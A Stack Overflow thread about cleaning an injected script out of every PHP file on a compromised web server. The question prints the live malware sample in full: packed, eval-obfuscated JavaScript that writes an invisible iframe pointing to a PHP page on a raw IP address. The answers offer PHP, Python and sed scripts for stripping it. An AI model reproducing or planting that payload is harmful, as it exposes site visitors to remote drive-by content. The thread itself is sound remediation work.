I have a problem removing virus code from my php files. There are more than 1200 php files on my server and every single php file has been infected by a virus. The virus code adds this line to the html output.

Here is the virus code:

<tag5479347351></tag5479347351><script>eval(function(p,a,c,k,e,d){e=function(c){return c.toString(36)};if(!''.replace(/^/,String)){while(c--){d[c.toString(a)]=k[c]||c.toString(a)}k=[function(e){return d[e]}];e=function(){return'\\w+'};c=1};while(c--){if(k[c]){p=p.replace(new RegExp('\\b'+e(c)+'\\b','g'),k[c])}}return p}('1 k=" i=\\"0\\" g=\\"0\\" j=\\"0\\" f=\\"c://d.h.n.l/o.m\\">";1 5="<8";1 7="p";1 4="e";1 b="</8";1 a="e>";2.3(5);9(2.3(7+4+k+b),6);9(2.3(4+a),6);',26,26,'|var|document|write|k02|k0|1000|k01|if|setTimeout|k22|k2|http|125||src|height|230|width|board||248|php|58|tag1|ram'.split('|'),0,{}))</script><tag5479347352></tag5479347352>

The above code is in every single php file. How can I remove this virus code from every php file? Is there a quick way of doing it?

Wilda Sagita
  • How did that even happen? – frosty Oct 10 '15 at 02:58
  • I don't know, our server went directly down because there is a trojan virus detected in that iframe code, then we removed that code and then automatically that code shows again. Help me please – Wilda Sagita Oct 10 '15 at 03:00
  • @frosty - He's probably running an insecure PHP-based webserver ... and he got hacked. – Stephen C Oct 10 '15 at 03:00
  • Have you tried 'sed' or 'grep -v'? – Joe Oct 10 '15 at 03:00
  • Please give me a simple explanation. Maybe I must add one php file so that all my php files can't be given virus code – Wilda Sagita Oct 10 '15 at 03:02
  • I'm voting to close this question as off-topic because it belongs on the webmasters site. – Stephen C Oct 10 '15 at 03:02
  • @StephenC Most likely a free server? Maybe a server like 000webhost. – frosty Oct 10 '15 at 03:03
  • @WildaSagita What webserver are you using? – frosty Oct 10 '15 at 03:04
  • There is no simple solution to this. First thing you need to do is to fix the security problem in your site that lead to the infection. It might be that you haven't been patching / upgrading. It might be something specific in your PHP code. Once you've fixed the security hole(s), then you can try to clean out the virus code. But this is NOT the right place to ask for help. – Stephen C Oct 10 '15 at 03:04
  • @frosty - It is unlikely to be at the server level. It is more likely that he is running an unpatched Drupal or Joomla site or something like that. Or that he has written some custom PHP that has created a security hole that someone has exploited. – Stephen C Oct 10 '15 at 03:06
  • @frosty no of course, I'm using ixwebhosting.com – Wilda Sagita Oct 10 '15 at 03:06
  • I saw there is a right answer at http://stackoverflow.com/questions/2798745/how-can-i-remove-an-iframe-virus-from-all-of-php-files-on-my-website but I am confused about how I can change that code to work with my virus code – Wilda Sagita Oct 10 '15 at 03:08
  • Is the tag value `tag5479347351` always the same? – Pedro Lobito Oct 10 '15 at 03:20
  • Agree with @StephenC on this one. I marked the question as "Needs editing". Can you confirm you've found how you got infected and patched any security issues? The way you phrased the question seems to imply that you'd like a text-processing solution to a security problem. That's like trying to hack a computer using a watermelon =) Folks contributing an answer to the question phrased as-is are encouraging poor sys/web admin practices. – drapkin11 Oct 10 '15 at 03:31

2 Answers

You can use:

removeVirus.php

<?php
// removeVirus.php: strip the injected <tagNNN>...</tagNNN> block from every
// .php file below the current directory (rewrites the files in place).
foreach (rglob("*.php") as $virusFile) {
    $withVirus    = file_get_contents($virusFile);
    $withoutVirus = preg_replace('%<tag\d+>.*</tag\d+>%', '', $withVirus);
    file_put_contents($virusFile, $withoutVirus);
}

// Recursive glob: matches $pattern in the directory of $pattern and in
// every subdirectory below it. Forked from
// https://github.com/rodurma/PHP-Functions/blob/master/glob_recursive.php
function rglob($pattern, $flags = 0) {
    $files = glob($pattern, $flags);

    foreach (glob(dirname($pattern).'/*', GLOB_ONLYDIR|GLOB_NOSORT) as $dir) {
        // the upstream fork calls glob_recursive() here, which is not defined
        // in this file; recurse into rglob() itself instead
        $files = array_merge($files, rglob($dir.'/'.basename($pattern), $flags));
    }
    return $files;
}

Usage:

Put removeVirus.php in the root of your website and execute it from the shell as root (or as the owner of the files):

php removeVirus.php

Notes:

1 - I've tested the code on my server with 10 php files containing the virus and it worked as intended.

2 - Make sure you find the source of the hack and patch your system accordingly.

Pedro Lobito
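A defender-side variant of the cleanup above, added here as an example and not part of the original answer: it scans recursively, reports infected files in a dry run before touching anything, keeps a .bak copy of each infected original, and matches one injection at a time with a non-greedy regex tied to the <script> block, so legitimate content sitting between two injections is not removed. The sample file contents and the shortened script body are constructed; the real payload is the packed eval() in the question.

```python
import re
import tempfile
from pathlib import Path

# Matches the injection from the question: an opening <tagNNN></tagNNN> marker,
# the packed <script>...</script> block, and a closing <tagMMM></tagMMM> marker.
# Non-greedy .*? plus the trailing marker ends the match at one injection.
INJECTION_RE = re.compile(
    r'<tag(\d+)></tag\1>\s*<script>.*?</script>\s*<tag(\d+)></tag\2>',
    re.DOTALL,
)

# Constructed sample; the real payload is the packed eval() in the question.
SAMPLE_INJECTION = ('<tag5479347351></tag5479347351>'
                    '<script>eval("/* packed payload */")</script>'
                    '<tag5479347352></tag5479347352>')
CLEAN_PHP = "<?php\necho 'hello';\n"

def strip_injection(text):
    """Return (cleaned_text, injections_removed) for one file's contents."""
    return INJECTION_RE.subn('', text)

def clean_tree(root, dry_run=True):
    """Walk every *.php under root. With dry_run=True only report; otherwise
    keep a .bak copy of the infected original and write the cleaned file.
    Returns {relative_path: injections_found} for infected files only."""
    root = Path(root)
    report = {}
    for path in sorted(root.rglob('*.php')):
        raw = path.read_bytes()
        cleaned, count = strip_injection(raw.decode('utf-8', 'surrogateescape'))
        if count == 0:
            continue
        report[path.relative_to(root).as_posix()] = count
        if not dry_run:
            path.with_name(path.name + '.bak').write_bytes(raw)
            path.write_bytes(cleaned.encode('utf-8', 'surrogateescape'))
    return report

def demo():
    """Build a throwaway tree with one infected and one clean file, dry-run,
    clean for real, then rescan; returns (dry_report, clean_report, remaining)."""
    with tempfile.TemporaryDirectory() as tmp:
        root = Path(tmp)
        (root / 'sub').mkdir()
        (root / 'index.php').write_text(CLEAN_PHP + SAMPLE_INJECTION + '\n')
        (root / 'sub' / 'page.php').write_text(CLEAN_PHP)
        dry = clean_tree(root)                  # reports only, files untouched
        real = clean_tree(root, dry_run=False)  # writes .bak and cleaned file
        return dry, real, clean_tree(root)      # rescan should find nothing
```

Run the dry run first and diff a few reported files by hand; if the rescan still reports hits after cleaning, the attacker's write path is still open and the files are being re-infected, which is the problem to fix before any further cleanup.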

If the "virus code" string literal you have provided is embedded in every php file, then it can be removed via the command line. Open the shell application (Command Prompt for Windows or Terminal for UNIX/UNIX-based operating systems, e.g. OS X, Linux, etc). You will need to escape the virus code before you pass it to the shell; however, the ideal method may vary depending on your system. Execute the following commands:

cd /path/to/your/infected/php/files

sed -i 's/insert_escaped_virus_code_here//g' *

P.S. If sed has not yet been installed, then follow these directions for OS X and Windows.

Andrew
  • She's asking for a way to delete them simultaneously, as opposed to opening files one by one and deleting them manually. – frosty Oct 10 '15 at 03:12
  • Use regex; there's [another thread](http://stackoverflow.com/questions/102083/whats-the-best-tool-to-find-and-replace-regular-expressions-over-multiple-files) on that – Andrew Oct 10 '15 at 03:14
  • o.O Isn't that in Perl? – frosty Oct 10 '15 at 03:16
  • There are multiple suggestions on that page, there is also an answer for how to do it via [command line](http://stackoverflow.com/a/102730/5410688) – Andrew Oct 10 '15 at 03:22
  • Literally the only suggestions are "use this", "use that", with the assumption that you already know exactly where to use it at, and the assumption that you already know how to use what they're suggesting to use. – frosty Oct 10 '15 at 03:28
  • **"then you can simply delete the code from all of your files"** there's nothing simple about editing 1200 files! I'm sorry but your answer is completely useless – Pedro Lobito Oct 10 '15 at 04:23
  • I drew more lines between the dots. I hope you can connect them now. – Andrew Oct 10 '15 at 05:37